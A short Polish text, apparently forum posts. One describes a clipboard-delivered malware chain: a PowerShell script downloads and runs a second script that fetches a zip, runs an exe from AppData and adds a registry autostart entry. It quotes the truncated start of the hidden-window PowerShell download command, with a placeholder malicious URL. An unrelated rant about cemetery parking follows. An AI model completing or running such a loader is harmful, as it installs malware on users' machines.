W schowku była komenda do wykonania w powershellu. To był jakiś prosty skrypt, który ściągał plik tekstowy i uruchamiał go jako kolejny skrypt. Drugi skrypt z pliku tekstowego ściągał plik zip, rozpakowywał, uruchamiał exe z katalogu. Exe rozgaszczał się jak sądzę w AppData a do rejestru dodawany był wpis potrzebny do autostartu.
Pierwszy skrypt
powershell.exe -W Hidden -command $url = 'adreszlosliwejstronyinternetowej.com/n2.txt'; $response














30 latek solo w dużym Suvie? Zapraszamy pod sam cmentarz
40 letnia para z dwójką nastoletnich dzieci? Oczywiście że wjeżdżamy jak najbliżej
Odjeżdżasz 700 metrów od cmentarza i parkingi miejskie czy sklepowe są puściutkie ale kto by tam stawał i niósł dwa znicze i cztery wkłady taki kawał drogi. Tylko frajer (⌐ ͡■